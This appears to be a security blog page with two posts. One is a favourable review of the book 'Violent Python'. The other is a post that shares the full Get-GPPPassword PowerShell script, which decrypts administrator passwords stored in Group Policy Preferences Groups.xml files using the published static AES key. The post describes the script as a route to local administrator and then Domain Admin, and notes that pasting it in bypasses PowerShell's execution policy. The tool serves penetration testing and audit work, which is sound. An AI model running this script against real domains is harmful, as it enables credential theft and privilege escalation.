"Violent Python" Review

The amount of effort that goes into writing any book is substantial, but the amount of effort that goes into a great book is mind-boggling. "Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers" by TJ O'Connor is a great book.  Despite the "cookbook" title, this book is well-organized and can be read cover-to-cover. If you are a security professional, you have already or will use the methods mentioned in the book.

The first chapter dives right into the basics of scripting and the Python scripting language which is probably the slowest part of the entire book. I imagine that the majority of readers will be comfortable with skipping the whole first chapter - but don't. The magic of the book is in how TJ preps most of the scripts and functions with a story which adds context to the effort of writing the script. I don't think I have ever seen that before and it's awesome. It almost prevents you from treating the book as a "cookbook" and only looking for "recipes" that are relevant to you.  Instead, you have a scenario where that method or function was important.  The reader is never left wondering "who would ever use that?"  I hope more authors follow the model created by this book. 

I don't have any major complaints about the content of the book, but there should probably be more discussion about the short-comings of relying on external libraries.  Modules and libraries make Python fast, flexible and powerful for most security professionals. However, penetration testers may find themselves on a remote box with Python already installed.  In that common scenario, its important to be able to accomplish similar tasks without having to download any external code.

There are two things that I hope the author and publisher do to further improve the book (and any other future books).  First, I would love to this book implement syntax highlighting.  I know color print would be more expensive, so maybe release a special edition. I would gladly pay more money to see code in color! The second thing I am anxious for is the ebook release. It's a new book, so I am sure it won't be long - but color should be an easy edition to kindle edition and I will always have access to the book that way.

Overall, it's my favorite book of the year and I will certainly be referencing it in the future.  It will be added to the recommended books page shortly and I really hope you pick up a copy and see how Python can make your life easier.

-Chris

GPP Password Retrieval with PowerShell

Last week, I read a great post entitled "Exploiting Windows 2008 Group Policy Preferences" that I wish I saw sooner.  The article included a nice Python script to accomplish the task of decrypting passwords that were set using the GPP feature in Windows 2008 domains.  However, it looked like something that would be handy to have in a PowerShell script.  Before I continue, I would like to point out the updated disclaimer, it certainly applies to this post.

You should read the original article, but the quick summary is that its possible for any authenticated user (this includes machine accounts) on the domain to decrypt passwords that are enforced with Windows 2008 Group Policy Preferences.  From my experience, this practice is common for larger domains which need to set different local administrator ("500" account) passwords for different OUs.

Python is an excellent scripting language, but PowerShell has two notable advantages in this specific use-case.  First, PowerShell does not require any additional libraries since it has access to the entire .NET framework.  Second, PowerShell is installed by default on all modern Windows systems to include Windows Server 2008 so it can be used right from the machine you are on.

The following Get-GPPPassword PowerShell script can be used by penetration testers to elevate to local administrator privileges (on your way to Domain Admin) by downloading the "groups.xml" file from the domain controller and passing it to the script.  The files are typically found in:

\\domain\SYSVOL\domain\Policies\{*}\Machine\Preferences\Groups\Groups.xml

Get-GPPPassword (Use Updated Version)
<# function Get-GPPPassword { <# .Synopsis Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml. Author: Chris Campbell (@obscuresec) License: GNU GPL v2 .Description Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password. .Parameter Path The path to the targeted groups.xml file. .Example Get-GPPPassword -path c:\demo\groups.xml .Link http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html #> Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" ) #Function to pull encrypted password string from groups.xml function Parse-cPassword { try { [xml] $Xml = Get-Content ($Path) [String] $Cpassword = $Xml.Groups.User.Properties.cpassword } catch { Write-Error "No Password Policy Found in File!" } return $Cpassword } #Function to look to see if the administrator account is given a newname function Parse-NewName { [xml] $Xml = Get-Content ($Path) [String] $NewName = $Xml.Groups.User.Properties.newName return $NewName } #Function to parse out the Username whose password is being specified function Parse-UserName { try { [xml] $Xml = Get-Content ($Path) [string] $UserName = $Xml.Groups.User.Properties.userName } catch { Write-Error "No Username Specified in File!" } return $UserName } #Function that decodes and decrypts password function Decrypt-Password { try { #Append appropriate padding based on string length $Pad = "=" * (4 - ($Cpassword.length % 4)) $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad) #Create a new AES .NET Crypto Object $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value $AesIV = New-Object Byte[]($AesObject.IV.Length) $AesObject.IV = $AesIV $AesObject.Key = $AesKey $DecryptorObject = $AesObject.CreateDecryptor() [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length) return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) } catch { Write-Error "Decryption Failed!" } } $Cpassword = Parse-cPassword $Password = Decrypt-Password $NewName = Parse-NewName $UserName = Parse-UserName $Results = New-Object System.Object Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password return $Results

To run the function, just copy and paste the text into powershell and type 'Get-GPPPassword'. This will in effect bypass the ExecutionPolicy.

Writing this script ended up not being as easy as I originally thought mostly due to never dealing with .NET and crypto before.  I would like to thank Matt Graeber for solving the null IV issue, Mike Santiago for general code improvements and of course Emilien Giraul (and the Sogeti ESEC Pentest team for their detailed writeup).

Try it out and let me know what you think.

***Update 26 May 2012***
You can also download the maintained version of the script from the PowerSploit repository on GitHub.  It already has some great scripts for Windows post-exploitation on it!

***Update 16 June 2012***
Updated the script block with the improvements from Matt Graeber.  Matt wrapped it into a function and apparently saved a puppy by creating a new object (avoiding the use of write-host).

***Update 3 July 2013***
I have reorganized and rewritten the script. You can find the updated version and read about it here.
-Chris